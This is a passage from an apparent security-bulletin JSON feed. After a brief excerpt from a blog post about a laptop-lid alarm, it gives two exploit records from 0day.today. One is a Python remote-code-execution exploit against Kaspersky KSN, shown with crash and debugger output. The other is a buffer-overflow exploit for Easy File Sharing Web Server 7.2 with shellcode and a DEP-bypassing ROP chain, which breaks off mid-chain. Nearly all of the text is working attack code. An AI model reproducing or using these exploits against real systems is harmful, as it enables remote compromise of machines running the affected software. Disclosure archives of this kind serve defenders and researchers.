to take more custom actions like sending an email, recording screen activity, and keeping logs of commands executed on the machine. 
\n\nCan someone please make one of these for Windows?", "reporter": "Bruce Schneier", "published": "2018-04-24T11:04:45", "type": "schneier", "title": "Computer Alarm that Triggers When Lid Is Opened", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-25T09:31:32", "id": "SCHNEIER:DA64CEDF3297A3D9505B61FE1F2E6A73", "href": "https://www.schneier.com/blog/archives/2018/04/computer_alarm_.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-04-24T13:22:40", "references": [], "description": "Exploit for windows platform in category remote exploits", "edition": 1, "reporter": "Juan Sacco", "published": "2018-04-24T00:00:00", "title": "Kaspersky KSN Remote Code Execution Exploit", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-04-24T00:00:00", "id": "1337DAY-ID-30231", "href": "https://0day.today/exploit/description/30231", "sourceData": "# Exploit Author: Juan Sacco <[email\u00a0protected]> - http://exploitpack.com\r\n# Vulnerability found using Exploit Pack v10\r\n# CVE: NotYet\r\n#\r\n# Exploit description:\r\n# Kaspersky KSN is prone to a remote memory corruption because it\r\nfails to properly filter the input on the remote subscribers, this\r\nleads to heap segments overwrite\r\n# and it leads to remote code execution.\r\n#\r\n#\r\n# Program description:\r\n# Kaspersky KSN for Linux enables cloud-assisted, multi-layered\r\nsecurity for servers and workstations running the Linux operating\r\nsystem. It delivers reliable protection with minimal impact on\r\n# performance.\r\n# Product homepage: http://kaspersky.com\r\n#\r\n# Example usage: python kasperky.py 192.168.1.1 6349\r\n#\r\n# Exploit history:\r\n# Discovered: Feb 2018\r\n# Reported to Kaspersky: Feb 2018\r\n# Fixed by Kaspersky: March 2018\r\n#\r\n# [!] 
Valgrind output:\r\n#\r\n# =3314== Invalid write of size 4\r\n# ==3314== at 0x24FA74:\r\nRespObject::SetSimpleString(std::__cxx11::basic_string<char,\r\nstd::char_traits<char>, std::allocator<char> > const&) (in\r\n/usr/local/ksn/bin/rocksdb-server)\r\n# ==3314== by 0x241814: RequestParser::Parse(unsigned char*,\r\nunsigned long, std::function<void (RespObject const&)>) (in\r\n/usr/local/ksn/bin/rocksdb-server)\r\n# ==3314== by 0x23B740:\r\nSession<boost::asio::basic_stream_socket<boost::asio::ip::tcp,\r\nboost::asio::stream_socket_service<boost::asio::ip::tcp> >\r\n>::HandleRead(boost::system::error_code const&, unsigned long) (in\r\n/usr/local/ksn/bin/rocksdb-server)\r\n# ==3314== by 0x22FF56:\r\nboost::asio::detail::reactive_socket_recv_op<boost::asio::mutable_buffers_1,\r\nboost::_bi::bind_t<void, boost::_mfi::mf2<void,\r\nSession<boost::asio::basic_stream_socket<boost::asio::ip::tcp,\r\nboost::asio::stream_socket_service<boost::asio::ip::tcp> > >,\r\nboost::system::error_code const&, unsigned long>,\r\nboost::_bi::list3<boost::_bi::value<Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,\r\nboost::asio::stream_socket_service<boost::asio::ip::tcp> > >*>,\r\nboost::arg<1> (*)(), boost::arg<2> (*)()> >\r\n>::do_complete(boost::asio::detail::task_io_service*,\r\nboost::asio::detail::task_io_service_operation*,\r\nboost::system::error_code const&, unsigned long) (in\r\n/usr/local/ksn/bin/rocksdb-server)\r\n# ==3314== by 0x23647C:\r\nboost::asio::detail::task_io_service::run(boost::system::error_code&)\r\n(in /usr/local/ksn/bin/rocksdb-server)\r\n# ==3314== by 0x1E978A: main (in /usr/local/ksn/bin/rocksdb-server)\r\n# ==3314== Address 0x0 is not stack'd, malloc'd or (recently) free'd\r\n# ==3314==\r\n# ==3314==\r\n# ==3314== Process terminating with default action of signal 11\r\n(SIGSEGV): dumping core\r\n# ==3314== Access not within mapped region at address 0x0\r\n# ==3314== at 
0x24FA74:\r\nRespObject::SetSimpleString(std::__cxx11::basic_string<char,\r\nstd::char_traits<char>, std::allocator<char> > const&) (in\r\n/usr/local/ksn/bin/rocksdb-server)\r\n# ==3314== by 0x241814: RequestParser::Parse(unsigned char*,\r\nunsigned long, std::function<void (RespObject const&)>) (in\r\n/usr/local/ksn/bin/rocksdb-server)\r\n# ==3314== by 0x23B740:\r\nSession<boost::asio::basic_stream_socket<boost::asio::ip::tcp,\r\nboost::asio::stream_socket_service<boost::asio::ip::tcp> >\r\n>::HandleRead(boost::system::error_code const&, unsigned long) (in\r\n/usr/local/ksn/bin/rocksdb-server)\r\n# ==3314== by 0x22FF56:\r\nboost::asio::detail::reactive_socket_recv_op<boost::asio::mutable_buffers_1,\r\nboost::_bi::bind_t<void, boost::_mfi::mf2<void,\r\nSession<boost::asio::basic_stream_socket<boost::asio::ip::tcp,\r\nboost::asio::stream_socket_service<boost::asio::ip::tcp> > >,\r\nboost::system::error_code const&, unsigned long>,\r\nboost::_bi::list3<boost::_bi::value<Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,\r\nboost::asio::stream_socket_service<boost::asio::ip::tcp> > >*>,\r\nboost::arg<1> (*)(), boost::arg<2> (*)()> >\r\n>::do_complete(boost::asio::detail::task_io_service*,\r\nboost::asio::detail::task_io_service_operation*,\r\nboost::system::error_code const&, unsigned long) (in\r\n/usr/local/ksn/bin/rocksdb-server)\r\n# ==3314== by 0x23647C:\r\nboost::asio::detail::task_io_service::run(boost::system::error_code&)\r\n(in /usr/local/ksn/bin/rocksdb-server)\r\n# ==3314== by 0x1E978A: main (in /usr/local/ksn/bin/rocksdb-server)\r\n# ==3314== If you believe this happened as a result of a stack\r\n# ==3314== overflow in your program's main thread (unlikely but\r\n# ==3314== possible), you can try to increase the size of the\r\n# ==3314== main thread stack using the --main-stacksize= flag.\r\n# ==3314== The main thread stack size used in this run was 8388608.\r\n# ==3314==\r\n# ==3314== HEAP SUMMARY:\r\n# ==3314== in use at exit: 769,426 bytes in 
7,522 blocks\r\n# ==3314== total heap usage: 15,342 allocs, 7,820 frees, 1,354,534\r\nbytes allocated\r\n# ==3314==\r\n# ==3314== LEAK SUMMARY:\r\n# ==3314== definitely lost: 8 bytes in 1 blocks\r\n# ==3314== indirectly lost: 0 bytes in 0 blocks\r\n# ==3314== possibly lost: 5,328 bytes in 9 blocks\r\n# ==3314== still reachable: 764,090 bytes in 7,512 blocks\r\n# ==3314== of which reachable via heuristic:\r\n# ==3314== newarray : 8,264 bytes in 4 blocks\r\n# ==3314== suppressed: 0 bytes in 0 blocks\r\n#\r\n# [!] Debugger output:\r\n#\r\n# [----------------------------------registers-----------------------------------]\r\n# RAX: 0x7ffe127426f0 --> 0x7ffe12742800 --> 0x7f7ee28fb1c0 -->\r\n0x7f7ee1d4f090 --> 0x7f7ee1894760\r\n(<_ZN5boost4asio6detail15task_io_serviceD2Ev>: push r13)\r\n# RBX: 0x0\r\n# RCX: 0x7f7ee2913000 --> 0x0\r\n# RDX: 0xffffffffffdf6bf0\r\n# RSI: 0x7ffe127426e0 --> 0x7ffe127426f0 --> 0x7ffe12742800 -->\r\n0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 --> 0x7f7ee1894760\r\n(<_ZN5boost4asio6detail15task_io_serviceD2Ev>: push r13)\r\n# RDI: 0x0\r\n# RBP: 0x7f7ee28f5338 --> 0x81\r\n# RSP: 0x7ffe127425c0 --> 0x7f7ee2924198 --> 0x7f7ee28f5320 --> 0x5\r\n# RIP: 0x7f7ee18b3a74\r\n(<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+4>:\r\n mov DWORD PTR [rdi],0x1)\r\n# R8 : 0x0\r\n# R9 : 0x7\r\n# R10: 0x2\r\n# R11: 0x7f7ee00276d0 --> 0xfffcdfc0fffcd800\r\n# R12: 0x29b\r\n# R13: 0x0\r\n# R14: 0x7ffe127426e0 --> 0x7ffe127426f0 --> 0x7ffe12742800 -->\r\n0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 --> 0x7f7ee1894760\r\n(<_ZN5boost4asio6detail15task_io_serviceD2Ev>: push r13)\r\n# R15: 0x7f7ee2924562 --> 0x543ffb3c7ef1cd2b\r\n# EFLAGS: 0x10207 (CARRY PARITY adjust zero sign trap INTERRUPT\r\ndirection overflow)\r\n# [-------------------------------------code-------------------------------------]\r\n# 0x7f7ee18b3a6e: xchg ax,ax\r\n# 0x7f7ee18b3a70\r\n<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE>:\r\n push 
rbx\r\n# 0x7f7ee18b3a71\r\n<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+1>:\r\n mov rbx,rdi\r\n# => 0x7f7ee18b3a74\r\n<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+4>:\r\n mov DWORD PTR [rdi],0x1\r\n# 0x7f7ee18b3a7a\r\n<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+10>:\r\nlea rdi,[rdi+0x10]\r\n# 0x7f7ee18b3a7e\r\n<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+14>:\r\ncall 0x7f7ee184a8a0\r\n<_ZNSt7[email\u00a0protected]plt>\r\n# 0x7f7ee18b3a83\r\n<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+19>:\r\nmov BYTE PTR [rbx+0x4],0x0\r\n# 0x7f7ee18b3a87\r\n<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+23>:\r\npop rbx\r\n# [------------------------------------stack-------------------------------------]\r\n# 0000| 0x7ffe127425c0 --> 0x7f7ee2924198 --> 0x7f7ee28f5320 --> 0x5\r\n# 0008| 0x7ffe127425c8 --> 0x7f7ee18a5815\r\n(<_ZN13RequestParser5ParseEPhmSt8functionIFvRK10RespObjectEE+3317>:\r\n mov rdi,QWORD PTR [rsp+0x110])\r\n# 0016| 0x7ffe127425d0 --> 0x7f7ee2901c08 --> 0x5a849d1562a512bd\r\n# 0024| 0x7ffe127425d8 --> 0x7f7ee29242c8 --> 0x10061030045\r\n# 0032| 0x7ffe127425e0 --> 0x361\r\n# 0040| 0x7ffe127425e8 --> 0x0\r\n# 0048| 0x7ffe127425f0 --> 0x7ffe127426e0 --> 0x7ffe127426f0 -->\r\n0x7ffe12742800 --> 0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 (--> ...)\r\n# 0056| 0x7ffe127425f8 --> 0x7ffe127426a0 --> 0x0\r\n# [------------------------------------------------------------------------------]\r\n# Legend: code, data, rodata, value\r\n# Stopped reason: SIGSEGV\r\n# 0x00007f7ee18b3a74 in\r\nRespObject::SetSimpleString(std::__cxx11::basic_string<char,\r\nstd::char_traits<char>, std::allocator<char> > const&) ()\r\n# gdb-peda$ where\r\n# #0 0x00007f7ee18b3a74 
in\r\nRespObject::SetSimpleString(std::__cxx11::basic_string<char,\r\nstd::char_traits<char>, std::allocator<char> > const&) ()\r\n# #1 0x00007f7ee18a5815 in RequestParser::Parse(unsigned char*,\r\nunsigned long, std::function<void (RespObject const&)>) ()\r\n# #2 0x00007f7ee189f741 in\r\nSession<boost::asio::basic_stream_socket<boost::asio::ip::tcp,\r\nboost::asio::stream_socket_service<boost::asio::ip::tcp> >\r\n>::HandleRead(boost::system::error_code const&, unsigned long\r\n\r\nimport binascii\r\nimport sys\r\nimport socket\r\nimport time\r\n\r\ndef rocksDB(target,port):\r\n try:\r\n while 1:\r\n # Open socket\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n # Set reuse ON\r\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n # Bind port\r\n s.connect((target, port))\r\n print(\"[\" + time.strftime('%a %H:%M:%S') + \"]\" + \" - \" +\r\n\"Connected to:\"), target, port\r\n print(\"[\" + time.strftime('%a %H:%M:%S') + \"]\" + \" - \" +\r\n\"Establishing connection.. \")\r\n packet =\r\nbinascii.unhexlify(b'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')\r\n # Log the packet in hexa and timestamp\r\n fileLog = target + \".log\"\r\n logPacket = open(\"exploit.log\", \"w+\")\r\n logPacket.write(\"[\"+time.strftime('%a %H:%M:%S')+\"]\"+ \" -\r\nWriting to socket: \" + binascii.hexlify(bytes(packet))+\"\\n\")\r\n logPacket.close()\r\n\r\n # Write bytecodes to socket\r\n print(\"[\"+time.strftime('%a %H:%M:%S')+\"]\"+\" - \"+\"Writing\r\nto socket: \")\r\n s.send(bytes(packet))\r\n # Packet sent:\r\n print(bytes(packet))\r\n try:\r\n data = s.recv(4096)\r\n print(\"[\" + time.strftime('%a %H:%M:%S') + \"]\" + \" -\r\n\"+ \"Data received: '{msg}'\".format(msg=data))\r\n except socket.error, e:\r\n print '[!] 
Sorry, No data available'\r\n continue\r\n s.close()\r\n except socket.error as error:\r\n print error\r\n print \"Sorry, something went wrong!\"\r\n\r\ndef howtouse():\r\n print \"Usage: kaspersky.py hostname port\"\r\n print \"[*] Mandatory arguments:\"\r\n print \"[-] Specify a hostname / port\"\r\n sys.exit(-1)\r\n\r\nif __name__ == \"__main__\":\r\n try:\r\n # Set target\r\n target = sys.argv[1]\r\n port = int(sys.argv[2])\r\n\r\n print \"[*] Kaspersky KSN RCE Exploit by Juan Sacco\r\n<[email\u00a0protected] \"\r\n rocksDB(target, port)\r\n except IndexError:\r\n howtouse()\n\n# 0day.today [2018-04-24] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30231"}, {"lastseen": "2018-04-26T00:05:20", "references": [], "description": "Exploit for windows platform in category remote exploits", "edition": 1, "reporter": "Hashim Jawad", "published": "2018-04-24T00:00:00", "title": "Easy File Sharing Web Server 7.2 - UserID Remote Buffer Overflow (DEP Bypass) Exploit", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-9059"], "modified": "2018-04-24T00:00:00", "id": "1337DAY-ID-30243", "href": "https://0day.today/exploit/description/30243", "sourceData": "#!/usr/bin/env python\r\n#---------------------------------------------------------------------------------------------------#\r\n# Exploit Title : Easy File Sharing Web Server 7.2 - 'UserID' Remote Buffer Overflow (DEP Bypass) #\r\n# Date : 04/24/2018 #\r\n# Exploit Author : Hashim Jawad #\r\n# Twitter : @ihack4falafel #\r\n# Author Website : ihack4falafel[.]com #\r\n# Vendor Homepage : http://www.sharing-file.com/ #\r\n# Software Link : http://www.sharing-file.com/efssetup.exe #\r\n# Original Exploit: https://www.exploit-db.com/exploits/44485/ #\r\n# Tested on : Windows 7 Enterprise (x86) - Service Pack 1 # \r\n#---------------------------------------------------------------------------------------------------#\r\n\r\nimport requests\r\nimport 
struct\r\nimport time\r\n\r\nhost='192.168.80.148'\r\nport='80'\r\n\r\n# badchars = \"\\x00\\x7e\\x2b\\x26\\x3d\\x25\\x3a\\x22\\x0a\\x0d\\x20\\x2f\\x5c\\x2e\"\r\n# [email\u00a0protected]:~# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v shellcode -f python\r\n# Payload size: 447 bytes\r\n\r\nshellcode = \"\"\r\nshellcode += \"\\x89\\xe3\\xd9\\xe5\\xd9\\x73\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\"\r\nshellcode += \"\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\"\r\nshellcode += \"\\x43\\x37\\x52\\x59\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\"\r\nshellcode += \"\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\"\r\nshellcode += \"\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x49\"\r\nshellcode += \"\\x6c\\x6b\\x58\\x4e\\x62\\x63\\x30\\x57\\x70\\x77\\x70\\x53\"\r\nshellcode += \"\\x50\\x6e\\x69\\x6b\\x55\\x64\\x71\\x39\\x50\\x50\\x64\\x6e\"\r\nshellcode += \"\\x6b\\x42\\x70\\x64\\x70\\x6c\\x4b\\x43\\x62\\x36\\x6c\\x6e\"\r\nshellcode += \"\\x6b\\x43\\x62\\x75\\x44\\x6e\\x6b\\x52\\x52\\x64\\x68\\x46\"\r\nshellcode += \"\\x6f\\x38\\x37\\x50\\x4a\\x76\\x46\\x64\\x71\\x4b\\x4f\\x4e\"\r\nshellcode += \"\\x4c\\x77\\x4c\\x35\\x31\\x61\\x6c\\x77\\x72\\x76\\x4c\\x37\"\r\nshellcode += \"\\x50\\x4a\\x61\\x5a\\x6f\\x74\\x4d\\x37\\x71\\x39\\x57\\x38\"\r\nshellcode += \"\\x62\\x5a\\x52\\x30\\x52\\x66\\x37\\x6e\\x6b\\x50\\x52\\x62\"\r\nshellcode += \"\\x30\\x6c\\x4b\\x62\\x6a\\x57\\x4c\\x6c\\x4b\\x52\\x6c\\x47\"\r\nshellcode += \"\\x61\\x74\\x38\\x6d\\x33\\x71\\x58\\x43\\x31\\x38\\x51\\x50\"\r\nshellcode += \"\\x51\\x6c\\x4b\\x33\\x69\\x67\\x50\\x35\\x51\\x48\\x53\\x6e\"\r\nshellcode += \"\\x6b\\x57\\x39\\x75\\x48\\x69\\x73\\x54\\x7a\\x63\\x79\\x4e\"\r\nshellcode += \"\\x6b\\x35\\x64\\x6c\\x4b\\x35\\x51\\x6a\\x76\\x46\\x51\\x39\"\r\nshellcode += \"\\x6f\\x6e\\x4c\\x6f\\x31\\x48\\x4f\\x44\\x4d\\x36\\x61\\x48\"\r\nshellcode += \"\\x47\\x34\\x78\\x6b\\x50\\x74\\x35\\x69\\x66\\x73\\x33\\x73\"\r\nshellcode += 
\"\\x4d\\x49\\x68\\x55\\x6b\\x43\\x4d\\x47\\x54\\x74\\x35\\x68\"\r\nshellcode += \"\\x64\\x63\\x68\\x4e\\x6b\\x46\\x38\\x66\\x44\\x33\\x31\\x59\"\r\nshellcode += \"\\x43\\x61\\x76\\x6c\\x4b\\x66\\x6c\\x50\\x4b\\x4c\\x4b\\x50\"\r\nshellcode += \"\\x58\\x47\\x6c\\x65\\x51\\x69\\x43\\x6c\\x4b\\x63\\x34\\x6e\"\r\nshellcode += \"\\x6b\\x43\\x31\\x68\\x50\\x4e\\x69\\x61\\x54\\x65\\x74\\x65\"\r\nshellcode += \"\\x74\\x51\\x4b\\x51\\x4b\\x73\\x51\\x73\\x69\\x62\\x7a\\x42\"\r\nshellcode += \"\\x71\\x69\\x6f\\x39\\x70\\x51\\x4f\\x73\\x6f\\x43\\x6a\\x4e\"\r\nshellcode += \"\\x6b\\x52\\x32\\x78\\x6b\\x4e\\x6d\\x31\\x4d\\x53\\x5a\\x67\"\r\nshellcode += \"\\x71\\x6c\\x4d\\x4f\\x75\\x48\\x32\\x57\\x70\\x77\\x70\\x43\"\r\nshellcode += \"\\x30\\x66\\x30\\x61\\x78\\x46\\x51\\x6e\\x6b\\x70\\x6f\\x6e\"\r\nshellcode += \"\\x67\\x59\\x6f\\x6b\\x65\\x4f\\x4b\\x78\\x70\\x6d\\x65\\x39\"\r\nshellcode += \"\\x32\\x50\\x56\\x73\\x58\\x6c\\x66\\x6c\\x55\\x4d\\x6d\\x6d\"\r\nshellcode += \"\\x4d\\x49\\x6f\\x49\\x45\\x65\\x6c\\x45\\x56\\x73\\x4c\\x45\"\r\nshellcode += \"\\x5a\\x6b\\x30\\x6b\\x4b\\x39\\x70\\x53\\x45\\x34\\x45\\x4d\"\r\nshellcode += \"\\x6b\\x42\\x67\\x65\\x43\\x63\\x42\\x70\\x6f\\x50\\x6a\\x37\"\r\nshellcode += \"\\x70\\x66\\x33\\x6b\\x4f\\x69\\x45\\x30\\x63\\x35\\x31\\x72\"\r\nshellcode += \"\\x4c\\x65\\x33\\x76\\x4e\\x75\\x35\\x42\\x58\\x45\\x35\\x67\"\r\nshellcode += \"\\x70\\x41\\x41\"\r\n\r\n# 4059 bytes to nSEH offset [filler + ROP + shellcode + filler]\r\nbuffer = '\\x41' * (2647-128) # filler to where ESP will point after stack pivot (see SEH gadget)\r\n\r\n# mona.py VirtualProtect() ROP template with few modifications \r\n\r\n# ESI = ptr to VirtualProtect()\r\nbuffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0x61c832d0) # ptr to &VirtualProtect() [IAT sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x1002248c) # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0x61c18d81) # XCHG EAX,EDI # 
RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x1001d626) # XOR ESI,ESI # RETN [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0x10021a3e) # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]\r\n\r\n# EBP = ReturnTo (ptr to jmp esp)\r\nbuffer += struct.pack('<L', 0x1001add7) # POP EBP # RETN [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0x61c24169) # & push esp # ret [sqlite3.dll]\r\n\r\n# EDX = NewProtect (0x40)\r\nbuffer += struct.pack('<L', 0x10022c4c) # XOR EDX,EDX # RETN [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 
0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += 
struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer 
+= struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\n\r\n# ECX = lpOldProtect (ptr to W address)\r\nbuffer += struct.pack('<L', 0x1001b377) # POP ECX # RETN [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0x61c730ad) # &Writable location [sqlite3.dll]\r\n\r\n# EBX = dwSize (0x00000501)\r\nbuffer += struct.pack('<L', 0x10015442)\t # POP EAX # RETN [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0xfffffaff) # will become 0x00000501 after negate\r\nbuffer += struct.pack('<L', 0x100231d1)\t # NEG EAX # RETN [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0x1001da09) # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll]\r\nbuffer += 